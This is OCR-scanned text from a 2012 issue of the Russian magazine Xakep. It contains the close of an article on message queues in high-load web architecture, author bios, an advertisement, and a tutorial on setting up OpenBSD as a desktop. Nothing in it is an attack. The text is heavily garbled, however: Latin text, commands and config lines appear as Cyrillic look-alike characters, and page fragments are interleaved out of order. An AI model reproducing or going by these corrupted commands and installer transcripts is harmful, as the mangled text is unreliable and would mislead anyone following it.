{ееб это может быть: 

• 99% пользователей просматри- 
вают ленту своих записей на одну- 
три страницы назад (обычнодо 
последней прочитаннойзаписи). 
Архив просматривается крайне 
редко. Можем ли мы как-нибудь 
использовать эту особенность? 

• Нам не надо показыватьполь- 
зователю сразу всю страницу, 
мы можем показатьему паруза- 



писей и, пока он смотритна них, 
подгружать остальные. 

Воттутнадо понаблюдать 
за работой конкурентов, например 
того же РасеЬоок. Алгоритм работы 
примернотакой: 

• сначала загружается обвязка; 

• затем происходитзапрос 
идентификаторов записей для 
данной пеѵѵз^еесі; 

• затем в цикле, начиная отсамых 
старых, запрашиваем подроб- 
ности прозаписи. 

Эту схему можно упростить — 
например часть да иных в виде 05ОЫ 



НІСНЮАО-ИНСТРУКТОРЫ 



Олег Бунин 



Известный 




специализиру- 
ется на консалтинге, разработке 
и тестировании высоконагру- 
женных веб- проектов. Сейчас 
является организатором конфе- 
ренции НідЫ_оасІ++ (ѵу 
ги]. Это конференция, посвящен- 
ная высоким нагрузкам, которая 
ежегодно собирает лучших в мире 
специалистов по разработке 
крупных проектов. Благодаря этой 
конференции знаком со все ми 
ведущими специалистами мира 
вы соконагруженных систем. 



Константин Осипов 

Специалистпо 
базам данных, 
который долгое 
время работал 
в Му5СІІ_, где 
отвечал как раз 
за высоконагру- 
женный сектор. 
Быстрота Му5СІІ_ — в большой 
степени заслуга именно Кости 
Осипова. В свое время он зани- 
мался масштабируемостью МуБОЬ 
5.5. Сейчас отвечает в МаіІ.Ри за 
кластерную МоБОЬ базуданных 
Тагапіооі, которая обслуживает 
500-600 тысяч запросов в секунду. 
Использовать этот 0 реп Бои гее 
проект может лю бой желающий. 



МаксимЛапшин 

Решения для 
организации 
видеотрансляции, 
которые существу- 
ютвмиренадан- 
ный момент, можно 
пересчитатьпо 
пальцам. Макс 
разработал одно из них — Егіуѵібео 
( егіѵѵісіео.огс 1. Это серверное прило- 
жение, котороезанимается потоко- 
вым видео. При создании подобных 
инструментов возникаетцелая куча 
сложнейших проблем со скоростью. 

У Максима также есть некоторый 
опыт, связанный с масштабировани- 
ем средних сайтов (не таких крупных, 
как МаіІ.Ри]. Под средними мы под- 
разумеваем такие сайты, количество 
обращений ккоторым достигает 
около 60 миллионов в сутки. 



Константин Машуков 

Бизнес-аналитик 
в компании Олега 
Бунина. Констан- 
тин пришел из 
мира суперком- 
пьютеров, где 
долгое время «пи- 
лил» различные 
научные приложения, связанные 
с числодробилками. В качестве 
бизнес-аналитика участвует во 
всех консалтинговых проектах 
компании, будь то социальные сети, 
крупные интернет-магазины или 
системы электронных платежей. 
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АКАДЕМИЯ 



загружать заранее при загрузке страницы. Если посмотреть 
страницы РасеЬоок, вы увидите только ЭаѵаБсгір*, вседанные 
представлены в виде ЭБОЫ -массивов. Это очень удобно — про- 
сто сделатьАЭАХ-обновление страницы без перезагрузки. 

Далее нужно сформулировать доп ол нительны е технические 
требования котказоустойчивости и скорости всей системы и от- 
дельных веб- сервисов. Наконец, для каждого из веб-сервисов, 
исходя из конкретных особенностей данных и требований 
к каждому компоненту, проектируем архитектуру и подбираем 
технологии. Многие технологи и имеют а налоги, и среди кла- 
стера технологий выбор стоит делать на основе предпочтений 
команды разработчиков. Чтоумеют, натом и надо работать. 

Итак, у нас есть довольно существенный поток да иных, об- 
ладающих, однако, определенными особенностями. Похоже, 
чтостоитразделитьсамизаписи и структуру пеѵѵз^еесГов. Не 
вседанные нужно показывать сразу, успокоил нас продакт- 
менеджер и дал пару минут, чтобы поместить новое сообщение 
пользователя во френдленты его друзей. Строго говоря, это 
можетбытьи нетакисходя из бизнес-логики проекта. Вэтом 
случае мы с вами выбрали бы другую архитектуру для системы 
хранения френдлент. При обсуждении п рода кт- менеджер ска- 
зал намтакже, что рассылку почтовыхуведомлений мы можем 
отложить на потом. Мы рассчитали объем задач, прикинули 
систему хранен ия для очереди и приступили к реализации. 

Строго говоря, использование серверов очередей не 
обязательно. Не умеете работать с Па ЬЫШ 0? Ничего страшно- 
го — используйте паттерн «Очереди», но храните список задач 
в обычном Му50І_. 



Интеркоммуникация: 
решение с очередью 




ИСПОЛЬЗОВАНИЕ ОЧЕРЕДЕЙ 
ДЛЯ ДОСТИЖЕНИЯ НАДЕЖНОСТИ 

Усложним задачу из примера с почтовыми рассылками. Итак, 
воркеру, обслуживающему почтовые рассылки, нужно разо- 
слать 25 писем. Три послали, на четвертом закончилось место на 
диске. Хлоп, сломалось! Если вы пишете синхронную рассылку 
в едином РНР-коде,тоу вас из-за отвалившегося почтовика 
может возникнуть 500-я ошибка для пользователя. Это вообще 
неприемлемо. 

Это важный аспект — с помощью очереди сообщений можно 
позволить сломаться какому-то куску вашей системы. Напри- 
мер, в одном из проектов, который мы разрабатывали, запись 
в базу шла через очередь сообщений. Это было очень удобно. 
Можно было для решардинга и других обслуживающих опера- 
ций выключить один из кусков базы да иных на какое-то время. 
Все это время у на с ту по росла очередь сообщений и что-то не 
записывалось. Потом, когда базу чиняти снова подключают, 
очередь рассасывается. 

Таким образом, очередьсообщений позволяетвам еще 
и функционально развязать куски всей вашей экосистемы и по- 
зволить кому-то сломаться на время без общей деградации. 

На рисунке изображено два сервиса, которые полностью 
независимы друг от друга. Поломка одного не приводит к по- 
ломке другого. Допустим, сервису А нужно отправить что-нибудь 
всервисБ.Он ста вит за дачу во внутреннюю очередь сервиса 
А. Раздающий демон (своего рода выходные ворота сервиса А] 
разбирает внутреннюю очередь и рассылает запросы вовне. 
Входные ворота сервиса Б при ни мают запрос и пи шут его во вну- 
треннюю очередь сервиса Б. Воркеры сервиса Б обрабатывают 
задачи из внутренней очереди. 

Подобная система не только практически неубиваема, она 
еще и восстанавливается после сбоя без потери данных :). Может 
сложиться впечатление, будто это нечтозапредельное, ноэто 
не та к. В крупных банковских системах подобные архитекту- 
ры встречаются на каждом шагу. Да и в веб-системах можно 
использовать что-то похожее для достижения независимости 
сервисов друг от друга. 



Интеркоммуникация: 
решение с очередью 




Обработка 
задач 
сервиса А 



РивЬ сообщений 

из сервиса А во все Прием задач 

остальные сервисы для сервиса Б 



Обработка 
задач 
сервиса Б 



В КАЧЕСТВЕ РЕЗЮМЕ 

Итак, мы с вами изучили один из 
самых мощных паттернов в проек- 
тировании веб-систем — исполь- 
зование очередей. Под очередями 
сообщений в проектировании 
веб-проектов могутпониматься две 
разные вещи. 

Во-первых, способ отложить 
задачу на потом. Нам надо сделать 
что-то, но пользователю надо отве- 
тить прямо сейчас. Мы выходим за 
рамки РНР'шного «запрос — ответ» 



и делаем что-то чуть позже, чем 
отдали ответ. 

Во-вторых, речь можетидти 
о так называемой общей шине дан- 
ных. У нас возникает межсервисная 
коммуникация, которая помогает 
разнести вызовы между сервисами, 
сделать их разными по времени 
и унифицировать общение между 
разными сервисами. 

Удачи! В следующем номере са- 
мое сложное — масштабирование 
баз данных, пн: 
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на правах рекламы 



РНШР5 




«Мужской карты» 



3 ДОМАШНИХ КИНОТЕАТРА НТ53593 
5 портативных ОѴО плееров Р07006 
9 бритв РоѵѵенТоцсн РТ730 




ОТ ФИРМЕННОГО ИНТЕРНЕТ-МАГАЗИНА РНІІ.ІР5 

5НОР.РНІЫР5.ІШ* 



мттітміімкі А Альфа* Банк (датеЦапй 



Оформить дебетовую или кредитную «Мужскую карту» 
можно на сайте ѵѵѵѵ^.аКаЬапк.ги или позвонив 
по телефонам; 

8 (49$) 788-88-78 в Москве 

8 - 800-2000 -000 н регионах России (звонок бесплатный) 



* ПОДРОБНОСТИ НА 
ѴУШѴ.МАМСАКР.НЦ 




ОАО «Альфа-Банк». Генеральная лицензия банка России на осуществление банковских операций от 05.03.2012 №1326" 



ІЖІХОІО 



Евгений Зобнин (ехесЫЬш] 



ПРИРУЧЕНИЕ 








1 



ИСПОЛЬЗУЕМ 
0РЕИВ50 В КАЧЕСТВЕ 
ДЕСКТОПА 

Когда разговор касается ОрепВЗй, на ум при- 
ходят межсетевые экраны, ІРБес-туннели 
и агентство национальной безопасности США. 
Тем не менее опенок может быть отличным 
десктопом, в котором нет простоты установки 
СІЬипІи, но есть логичность и проработанность 
каждого компонента, а также солидный набор 
первоклассных инструментов администриро- 
вания прямо из коробки. 



ВВЕДЕНИЕ 



ОрепВЗй не принято использовать на десктопах, но чем больше 
разбираешься в этой ОС, тем больше хочешь видеть ее на своем 
домашнем компе. Здесь нет излишнего переусложнения систем- 
ных компонентов, нет инсталлятора, создатели которого считают 
пользователя идиотом, нет нагромождения софта, написанного 
разными людьми в разных условиях и с разным виденьем удоб- 
ства использования программы. Но здесь есть сквозная простота, 
абсолютная логичность и вылизанность компонентов системы. 
Только когда начинаешь использовать ОрепВЗО, понимаешь, на- 
сколько толсты, неуклюжи и перегружены функционалом І_іпих- 
дистрибутивы. 

ОрепВЗО может дать пользователю все, что только требуется 
от современной ОС, но она не терпит дураков. Зная, как пользо- 
ваться этой системой, ты сможешь существенно повысить эф- 
фективность своей работы в никсах и научишься решать задачи 
простым и логичным путем. Правда, чтобы приручить этого зверя, 
придется включить мозги и набраться терпения. Эта статья всего 
лишь вводный курс в использование ОрепВЗй на десктопе, но 
даже ее хватит для того, чтобы настроить полноценную рабочую 
станцию и начать ее использовать на всю катушку. 
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Приручение строптивой 



НАЧАЛО НАЧАЛ, ИЛИ УСТАНОВКА 
НА ЖЕСТКИЙ ДИСК^^^^М 



Как и все другие ОС, ОрепВЗй распространяется в виде 150- 
образов и даже образов флоппи-дисков, которые можно ис- 
пользовать для установки системы на совсем старое железо. 
150-образов при этом предлагается два: для установки по сети 
(имя ссІХХ.ізо, где XX — номер версии ОС) и полная система (файл 
іпзІаІІХХ.ізо), которая включает в себя все, кроме сторонних 
пакетов. Получить образы можно с любого из доступных РТР- 
серверов, например зН:.Іѵ/07ХѵѵУс . Следует перейти в каталог 
с номером версии ОС (например, 5.1), а далее — в каталог с име- 
нем нужной архитектуры (І386 или атсІ64 для стандартных ПК) 
и скачать подходящий образ, в моем случае іпзіаіібі.ізо. 

После загрузки с компакт-диска ты увидишь на экране при- 
ветственное сообщение, сразу за которым последует приглашение 
инсталлятора. Последний, как и все остальное в 0репВ5й, выпол- 
нен в аскетично-гиковом стиле. Здесь нет графического или даже 
псевдографического интерфейса, нет автоматизированной про- 
граммы разбиения диска на разделы. Все операции выполняются 
путем ответов на вопросы, появляющиеся на экране. Несмотря на 
архаичность такого подхода к установке, инсталлятор становится 
очень эффективным в руках знающего человека, позволяя выпол- 
нить все шаги установки и первоначальной настройки буквально 
за пару минут. 

Первый вопрос инсталлятора касается режима работы ЫѵеСО: 



(І)пз-раіі,, (ІІ)р§гасІе ог (5)Ье11? 



Нас интересует первый пункт, поэтому вводим символ 'Г. Да- 
лее — раскладка клавиатуры: 



СРюозе уоиг кеуЬоагсІ Іауоиі: ('?' ог ' І _ ' -Рог Іізі:) 



Жмем <ЕпІег>, чтобы выбрать стандартную ОѴѴЕРТУ-раскладку. 
После этого необходимо ввести имя хоста: 



|Буз~Рет Ьоз1:пате? (зЬогІ: -Рогт, е.§. '-Роо') 



Набираем любое понравившееся имя и жмем <ЕпІег>. Далее 
инсталлятор выведет список доступных сетевых интерфейсов 
и предложит сконфигурировать один из них: 



\ѵаі1аЬ1е пе-рмогк іп-рег-Расез аге: ет0 ѵІапѲ. 

\ІИісИ опе сіо уои мізЬ 1:о сопб§иге? (ог ' сіопе') [етѲ] 



Сетевая установка 0репВ50 с помощью минимального образа 
диска (ссібі.ізо) — распространенная практика, поэтому данный 
вопрос появляется одним из первых. Жмем <Еп1ег> и видим на 
экране запрос ІР-адреса интерфейса етО (естественно, в твоем 



случае имя интерфейса может быть и другим, в В50-системах имя 
интерфейса зависит от производителя сетевухи): 



|іРѵ4 асісігезз -Рог етѲ? (ог ' сІМср 1 ог 'попе') [сІЬср] 



Жмем <ЕпІег>, чтобы ІР-адрес и все остальное было получено 
от ОНСР-сервера. В противном случае вводим айпишник и от- 
вечаем на еще несколько вопросов об адресах ОНСР-сервера, 
дефолтовом шлюзе и так далее. Затем нам предложат назначить 
ІРѵб-адрес, жмем <ЕпІег>, чтобы не делать этого: 



ІРѵб асісігезз -Рог -РхрѲ? (ог ' г-рзоі' ог 'попе') [попе] 



Далее будет выдан запрос относительно настройки конфигура- 
ции других интерфейсов: 



АѵаіІаЬІе пеііыогк іп-рег-Расез аге: етѲ ѵІапѲ. 

ІлІРііс Рі опе сіо уои мізЬ ѣо сопРі§иге? (ог 'сіопе') [сіопе] 



Как видно, кроме етО остался только ѵІапО, то есть виртуаль- 
ный сетевой интерфейс, поэтому инсталлятор предлагает нажать 
<ЕпІег>, чтобы перейти к следующему этапу установки. Так и дела- 
ем и видим на экране следующее: 



11зіп§ йІМБ сіотаіппате ту.сіотаіп 
11зіп§ йІМБ патезегѵегз аі: 192.168.0.1 

Эо уои мапі: Іо сіо апу тапиаі пеііыогк сопб§ига1:іоп? [по] 



Жмем <ЕпІег>, чтобы отказаться от последующего ручного конфи- 
гурирования сети. Теперь мы должны дважды ввести пароль гооСа: 



РаззыогсІ -Рог гооі: ассоипі:? (ыііі по! есбо) 
РаззыогсІ -Рог гооі: ассоипі:? (а§аіп) 



После чего нам предложат прописать ззЬсІ и пірб в автозагрузку: 



5-рагІ: ззіісі(8) Ьу сІеТаиІІ:? [уез] 
Б-Рагі: п-ррсі ( 8 ) Ьу СІеТаиІІ:? [по] 



Нажимаем два раза <ЕпІег>, чтобы ззЬсІ запускался, а пРрсІ — 
нет. Далее инсталлятор спросит нас о том, будет ли на этой машине 
работать ХѴѴіпсІоѵѵ. Единственное, на что он влияет, — это помеще- 
ние в конфиг/еіс/зузсіі.сопі 1 строки тасЬсІер.аІІоѵѵарегІиге=1, без 
которой запуск иксов невозможен: 



ро уои ехрес-р 1:о гип -рЬе X Ілііпсіом Бузует? [уез] 



Жмем <Еп1ег>, чтобы согласиться. Далее нас спросят о запуске ХйМ 
по умолчанию, то есть запуске иксов сразу после загрузки системы: 
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Так по умолчанию выглядит рабочий стол ОрепВЗй 



ро уои мапі ііте X ілііпсіоіл/ Бузіегп іо Ье зіагіесі Ьу хсіт(і)? [по] 



Жмем <Еп*ег>, чтобы отказаться, так как вместо убогого ХйМ 
мы будем использовать более современный менеджер входа (хотя 
эстеты могут ввести здесь «уев», чтобы наслаждаться ХйМ). Далее 
нам предложат добавить в систему пользователя: 



Беіир а изег? (епіег а Іомег-сазе 1о§іппате^ ог 'по') [по] 



Отказываемся нажатием <Еп1ег>, эту операцию проще 
выполнить после установки. Следующий шаг — выбор 
временной зоны: 



ІлІІіаІ: іітегопе аге уои іп? ('?' -Рог Іізі) [Сапасіа/Моипіаіп] 



Вводим, например, Еигоре/Мозсоѵѵ. Найти нужную зону можно 
здесь: еп.ѵѵікіресІіа.огдАл/ікі/І-івІ оі ІА1МА ііте гопез . На следую- 
щем шаге установщик спросит о жестком диске, на который будет 
устанавливаться система, и использовании уникальных номеров 
йІІЮ в /еІсДзІаЬ вместо путей к файлам устройств: 



АѵаіІаЬІе сіівкв аге: мсІѲ. 

ІлІРіісІп опе із ібе гооі сіізк? (ог 'сіопе') [ысІѲ] 

ІІзе йІІЮз гаібег ібеп сіеѵісе патез іп ТзіаЬ? [уез] 



В домашней машине обычно только один диск, поэтому смело 
жмем <Еп1ег> два раза. Далее мы должны ответить, хотим ли мы, 
чтобы ОрепВБО использовала весь диск: 



|Цзе (ІдІ)ІіоІе сіізк ог (Е)сііі 1=1іе МВК? [шітоіе] 



В случае установки ОрепВБО внутри виртуальной машины 
просто жмем <Еп1ег>, чтобы отдать весь диск под систему и не му- 
читься с разбивкой. Если же речь идет о реальной машине, на кото- 
рой уже установлена одна или несколько операционных систем, 
то следует ввести ’е', а затем создать дополнительный раздел для 
ОрепВБО с помощью {сіізк. 

После нажатия <Еп*ег> инсталлятор произведет предвари- 
тельную разбивку раздела/диска на ОрепВБО-партиции (все В50- 
системы используют собственную схему разметки диска, которая 
несовместима с другими ОС и создается внутри обычного раздела) 
и выведет их список на экран, предоставляя выбор — откорректи- 
ровать либо согласиться с предложенной схемой: 




Рабочий стол ХТсе в ОрепВЗР 



ІІзе (А)иіо Іауоиі, (Е)сііі: аиіо Іауоиі, ог сгеаіе (С)изіот Іауоиі? 



На данном этапе лезть в дебри утилиты сІізкІаЬеІ, с помощью 
которой происходит разметка, смысла нет, поэтому просто жмем 
<Еп*ег>, соглашаясь на то, что предложил инсталлятор (тем, кто 
не терпит автоматический режим, предложу ссылку на пошаговое 
руководство по ручной разметке: доо.дІ/еМВіа ). После непро- 
должительной процедуры разбивки следует выбрать источник 
установки системы: 



|і.осаііоп о-р зеіз? (ссі сіізк Тір Ніір ог 'сіопе') [ссі] 



Опять же жмем <Еп*ег>, соглашаясь на установку с СО. На 
следующий вопрос о выборе дисковода также отвечаем нажатием 
клавиши «Ввод» (у тебя ведь только один дисковод?). Далее выбор 
пути, по которому располагаются пакеты на диске: 



|Ра1:Мпате іо ііте зеТз? (ог 'сіопе') [5.1/І386] 



Здесь вообще без вариантов: <Еп*ег>. Далее система выведет 
на экран список «сетов», то есть наборов ПО, и предложит выбрать 
нужные: 



Беі пате(з)? (ог 'аЬогі' ог 'сіопе') [сіопе] 



По умолчанию будет выбрано все, что весьма логично, поэтому 
продолжаем нажатием <Еп*ег> (чтобы исключить из процесса 
установки какой-либо сет, нужно использовать знак «-», так, кон- 
струкция «-х*» отменит установку всех Х-компонентов). Начнется 
установка системы, которая продлится буквально несколько 
минут, после чего инсталлятор попросит выбрать дополнительный 
источник установки: 



І_осаііоп оТ зеТз? (ссі сіізк Тір ІтЬір ог 'сіопе') [сіопе] 



Жмем <Еп*ег>. На этом все, вводим геЬоо*, чтобы перезагру- 
зиться. 



ПОСТИНСТАЛЛЯЦИОННОЕ КОНФИГУРИРОВАНИЕ 



Установка закончена, но на этом наша эпопея с вводом команд 
и ответами на вопросы еще не завершена. Теперь нам необходимо 
произвести послеустановочную настройку: добавить обычного 
пользователя, настроить автомонтирование накопителей, уста- 



116 



ХАКЕР 10/165/2012 
















Приручение строптивой 




Постер, посвященный выходу ОрепВБй 5.1 



новить графическое окружение и настроить графический вход 
в систему. Все это делается опять же из командной строки. 

Для начала войдем в систему, добавим нового бесправного 
пользователя и назначим ему пароль. Как и в других никсах, сде- 
лать это можно с помощью команд изегасісі и раззѵѵсі: 

# иазегасісі -ш - 6 мбееі имя_юзера 

# разшсі имя юзера 

Обрати внимание, что раззѵѵсі из ОрепВЗй не допустит при- 
менения коротких и простых паролей, так что придется придумать 
что-то изысканное. Теперь добавим в конфиг зисіо строку, которая 
позволит созданному пользователю выполнять любые команды от 
имени гооі: 

# есбо 'имя_юзера АІ_І_=(АІ_І_) 5ЕТЕІМѴ: АН' >> /еіс/зисіоегз 

Теперь можно выйти, набрав команду ехіі, и залогиниться под 
именем созданного пользователя. Следующий шаг, который не- 
обходимо сделать, — это установить ЬазЬ, графическую среду и все 
необходимые приложения. В ОрепВВО приложения распространя- 
ются в виде портов и пакетов, собранных из портов. Первый способ 
установки приложений дает больший контроль над установкой, 
позволяя собрать приложения с теми опциями, которые нужны 
конкретно тебе, второй — быстрее и проще. Мы пока не будем 
заморачиваться с портами и для установки всего необходимого 
воспользуемся пакетами. 



Управлять пакетами можно с помощью стандартных для В5й 
команд ркд_абс1, ркд_беІек, ркд_іпк и нескольких других, однако, 
чтобы они заработали, необходимо указать источник установки 
пакетов, прописав его адрес в переменную окружения РКС_РАТН: 

$ ехрогі РК6_РАТН=-Рір://іір.согЬіпа.ги/риЬ / \ 
0репВ50/$(ипате -г)/раска§ез/$(ипате -ітО/ 

Теперь можно установить ЬазЬ, ѵіт и другие инструменты, кото- 
рые могуттебе понадобиться: 

$ зисіо рк§_асИ -ѵ Ьазб ѵіт зсгееп еііпкз 

Обрати внимание, что короткие имена пакетов сработают, толь- 
ко если в репозитории пакет с таким именем лишь один. В против- 
ном случае ркд_асИ выведет список пакетов с одинаковым именем 
и попроситтебя установить один из них, указав полное имя. После 
того как команда ркд_асИ будет выполнена, меняем свой шелл 
на ЬазЬ и прописываем ѵіт в качестве редактора по умолчанию 
(все это опционально, и ты можешь остаться на стандартных 
для ОрепВВО кзЬ и ѵі): 

$ 5исІо и5егтосІ -з /изг/ІосаІ/Ьіп/ЬазІі 

$ есбо 'ехрогі: ЕОІТОК=ѵіт' >> _^/ . Ьазіігс 

$ есЬо 'ехрогі РКе_РАТН=-Рір:_//-Рір.согЬіпа.ги/риЬу^ 

ОрепВ5й/$(ипате -г)/раска§ез/$(ипате -т)/' >> ~/. Ьазіігс 
$ ЬазЬ 

Теперь можно установить графическую среду. Я предлагаю 
использовать Хке как легкую среду для легкой ОС. В ОрепВВО Хке 
разбита на множество пакетов, большинство из которых никак 
не зависят друг от друга, поэтому их придется устанавливать по 
отдельности. Чтобы инсталлировать базу, достаточно набрать 
следующую команду: 

$ зисіо рк^асИ -ѵ х-Рсе4-зеззіоп хісіезкіор х-Рші4 

Пакет вытянет вместе с собой 6ТК, ОІіЬ, саіго, сІ-Ьиз, некото- 
рые компоненты среды и все необходимое для их работы (кроме 
Х.Огд, он идет в комплекте базовой системы). После того как 
среда будет установлена, можно запустить иксы, добавив Хке 
в автозагрузку: 

$ есЬо '1С_СТУРЕ="ги_Ки.иТР-8'^_ > -/.хіпіігс 
$ есЬо ’зеіхкЬтар "из^ги" "^ыіпкеуз" "§гр: сарз__іо§§1е" &' \ 
>> ~/. хіпіігс 

$ есЬо 'ехес х-Рсе4-зе ззі оп ' >> ~/. хіпіігс 
% 1п -з ~/, хіпіігс ~/»хзе55Іоп 
$ зіагіх 

Первая команда здесь нужна, чтобы установить правильную 
локаль, позволив приложениям корректно выводить текст на 
русском; вторая — чтобы настроить переключение языков между 
русским и английским по клавише <Сарз І_оск>; третья запускает 
Хке; четвертая нужна, чтобы Хке также попала в автозагрузку гра- 
фического менеджера логина, который мы установим позже. Чтобы 
инсталлировать весь Хке целиком, установи следующие пакеты: 

^ік-х-Рсе-еп^іпе 1іЬх-Рсе4тс5 1іЬх-Рсе^иі4 
х-Рсе-тсз-тапа^ег х-Рсе-тсз-рІи^іпз хісе-иіііз 
хісе4-* хісіезкіор х-Рмт4 х-Рші4-іІіете5 

Этот список можно сохранить в файл (ты найдешь его на прила- 
гаемом к журналу диске), а затем установить все разом с помощью 
следующей команды: 

$ зисіо рк^ асісі -ѵ $(саі файл^ 
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Чтобы настроить графический логин в систему, мы должны уста- 
новить менеджер входа, такой как СЮМ, КОМ, или воспользоваться 
стандартным ХОМ. К сожалению, первые два тянутза собой большое 
количество ненужных зависимостей, а третий выглядит скверно, 
поэтому мы установим простой и стильный менеджер 5І_ІМ: 

$ біісіо рк§_асИ -ѵ БІіт 

Чтобы он запускался автоматически после старта системы, до- 
бавь в /еіс/гс.іосаі следующую строку: 

# ѵі /еіс/гс Лосаі 

[ -х /е1=с/гс .СІ/5ІІ Ш ] && /е1:с/гс.сІ/5Ііт зіагі: 

Если же нужен автологин, достаточно добавить в /еіс/зііт.сопі 1 
две строки: 

# ѵі /еіс/зііт.соп-р 

сіе-раиіігизег имя_юзера 
аи1:о_1о§іп уез 

Теперь после перезагрузки машины будет сразу стартовать 
графическое окружение. 



ПАКЕТЫ И ПОРТЫ 



Мы научились устанавливать пакеты, но что делать, если прило- 
жение необходимо удалить из системы? Для этого служит команда 
ркд_беІеІе, просто запусти ее с именем нужного пакета, и ты его 
больше не увидишь: 

$ зисіо рк§_сІе1е1:е хТсІезкІіор 

Удалять пакет со всеми зависимостями ркд сіеіеіе не умеет, 
но утилита принимает флаг '-а', с помощью которого можно под- 
чистить систему от осиротевших зависимостей. Кроме того, если 
сам пакет является зависимостью, команда выведет на экран 
список его «родительских» пакетов, так что ты легко разберешься 
в веренице взаимных зависимостей. 

Чтобы просмотреть список пакетов, можно использовать коман- 
ду ркд_іп1ю, которая просто выводит на экран имена всех пакетов 
с версией и кратким описанием. Также тебе будут доступны коман- 
ды ркд_сгеа*е и ркд_сЬескдля создания и проверки целостности 
пакетов, а из репозитория можно установить ркд_МпсІ, с помощью 
которой легко найти нужное приложение. Всего в репозитории 
ОрепВБй доступно около 5000 пакетов, среди которых есть все не- 
обходимое, начиная от Рігеіюх и заканчивая различными мелкими 
инструментами вроде іоіор. 
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Устанавливаем ХТсе 



ШИ 

• Кроме 150-образов, 
команда ОрепВБО 
распространяет набор 
фирменных компакт- 
дисков, на которых 
помимо основной 
системы содержатся 
также набор допол- 
нительных пакетов, 
постеры с символи- 
кой ОрепВБО и музы- 
кальная композиция, 
подготавливаемая 
к каждому релизу. 

• В базовую постав- 
ку ОрепВБО входит 
два веб-сервера: 
пдіпх и АрасНе с на- 
бором патчей для 
повышения безопас- 
ности и бэкпортами 
функциональности из 
второй версии. 

• ОрепВБО имеет 
самый большой 
набор качествен- 
ных драйверов 
для беспроводного 
оборудования среди 
всех ВБО-систем. 

• ОрепВБО 
поставляется 
с собственным 
звуковым сервером 
аисаі, который 
можно использовать 
для смешивания 
аудиопотоков 
из разных источников 
без необходимости 
установки риізеаисііо 
или іаск. 

В случае необходимости приложение можно поставить из пор- 
тов, это позволиттебе произвести оптимизацию при сборке либо 
указать необходимые опции. По умолчанию ОрепВБО поставляется 
без коллекции портов, заставляя пользователя скачать последний 
для данной версии срез портов. Сделать это очень просто, доста- 
точно ввести три команды: 

$ зисіо тксііг /изг/роіЛз 

$ -Рѣр -Р1:р://-Р1:р.согЬіпа.пи/риЬ/0репВ50/5.1/рог1:5.1:аг.§2 
$ біісіо 1=аг -С / из г/ рог1=5 -гхѵр-Р ~/рОГІІ5.1=аП.^2 

Далее можно перейти в каталог /изг/рогіз, найти нужный порт 
и собрать его. Например: 

# ссі /изг/рогііз/зузиііііз/пиі: 

# епѵ ГІ.АѴ(Ж=по_с^і таке Л-П5І:а11 сіеап 

Система портов во всех ВБй почти идентичная, поэтому если ты 
когда-либо работал с РгееВБР, то легко разберешься. 



АВТОМОНТИРОВАНИЕ 



В ОрепВБО нет ибеѵ, зузіъ или динамической файловой системы 
беѵіъ, поэтому стандартные механизмы автомонтирования не сра- 
ботают. У пользователя остается выбор: либо настроить архаичный 
атсі для автомонтирования, либо сделать так, чтобы монтирова- 
ние можно было выполнить с помощью одной простой команды. 

Мы пойдем по второму пути, и позже я объясню почему. 

Чтобы сделать монтирование удобным, мы должны, во-первых, 
сделать так, чтобы диски и флешки мог монтировать любой поль- 
зователь; во-вторых, добавить необходимые записи в Мс/ЫаЬ. 
Первая операция выполняется с помощью пяти команд: 




со со *о 

см о см 

СО 
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Приручение строптивой 



$ зисіо тксііг /тп1:/иБЬ /тпіі/ссігот 
$ зисіо сііоып имя пользователя /тгтЕ/изЬ /тпіі/ссігот 
$ зисіо сіітосі 660 /сІеѵ/зсІѲі /сІеѵ/ссІ0а 
$ зисіо зузсЕІ кегп.изегтоип1:=1 

$ зисіо з И -с "есбо ' кет . изегтоип1:=1 ' >> /е'Ьс/зузс'Ы . соп-р" 
Вторая — двух: 

# есііо "/сІеѵ/зсІѲі /тпІі/изЬ тзсіоз пл/.посіеѵ.поехес. \ 

позиісі.поаиіго. -І_ги_КЦ.І)ТР-8. -РСР866 0 0" >> /е1=с/-р5І=аЬ 

# есііо "/сІеѵ/ссІѲа /тпѣ/ссігот ссІ9660 гм., посіеѵ., поехес, \ 

позиісі., поаиѣо 0 0" >> /е1:с/-р5І:аЬ 



все беспроводные роутеры, в ОрепВЗБ встроена прямо в ядро, 
а не реализована в виде внешнего приложения \л/ра_зиррПсап1, 
как в других юниксах, поэтому ѵѵіссі и ІМеІѵѵогкМападег работать не 
будут, зато сеть легко настроить на уровне системы. 

Итак, выясняем имя сетевого интерфейса с помощью чтения 
сітезд. Допустим, мы нашли имя гаІО, теперь создаем файл /еіс/ 
ИозІпате.гаІО и пишем в него следующее: 

гшісі 55ІР-сети шра ырарзк "шра-рзк ззісі ПАРОЛЬ" 
сіііср 

Сохраняемся и заставляем систему перечитать настройки: 



Обрати внимание на имена файлов устройств. ІІ5В-накопители 
в ОрепВВй всегда монтируются как 5С5І-диски с именем зсІО, зсіі 
и так далее и буквой, означающей раздел. Разделы со сторонними 
ФС (включая РАТ и ЫТР5) получают имена, начиная с символа і, 
поэтому «зсІОі» — это первый раздел (а он обычно единственный) 
первой воткнутой флешки. Имя «ссІОа» — это загрузочный сектор 
диска в первом дисководе. Теперь монтировать флешки и диски 
можно с помощью таких команд: 

$ тоигѵЬ /тігЬ/изЬ 
$ тоипі: /тпѣ/ссіпот 

При этом графические среды, такие какХке и СІМОМЕ, будут де- 
лать это автоматически при нажатии на ярлык устройства. Именно 
по этой причине мы отказались от использования атсі, он бы внес 
дополнительную сложность, не дав никаких преимуществ. 



СЕТЬ 



Благодаря инсталлятору твоя сеть уже настроена, однако на слу- 
чай, если возникнут какие-либо проблемы, ты должен знать, как 
изменить конфигурацию. Настройка любого сетевого интерфейса 
во всех ОС включает в себя три шага: (1) назначение ІР-адреса, 
маски подсети и так далее сетевому интерфейсу, (2) указание 
шлюза по умолчанию и (3) настройку 0145. Первый шаг в ОрепВБй 
выполняется с помощью записи строки в файл /еІс/ЬозІпате.ХХХ, 
где XXX — имя сетевого интерфейса (в нашем случае етО). Все, 
что нужно сделать, — это просто записать в файл строку примерно 
такого вида: 

іпе* * 10.0.0.38 255.255.255.0 ІЧОІЧЕ 



где іпеі — семейство протоколов (ІРѵ4), 10.0.0.38 — ІР-адрес, 
255.255.255.0 — маска подсети, а І40І4Е — широковещательный 
адрес (будет выбран автоматически). Чтобы интерфейс конфигу- 
рировался с помощью йНСР, достаточно поместить в файл строку 
сІЬср. Для указания шлюза по умолчанию достаточно записать его 
адрес в файл /еіс/тудаіе, например: 

$ зисіо з И -с "есііо '10.0.0.1' > /еіс/ту^аіе" 

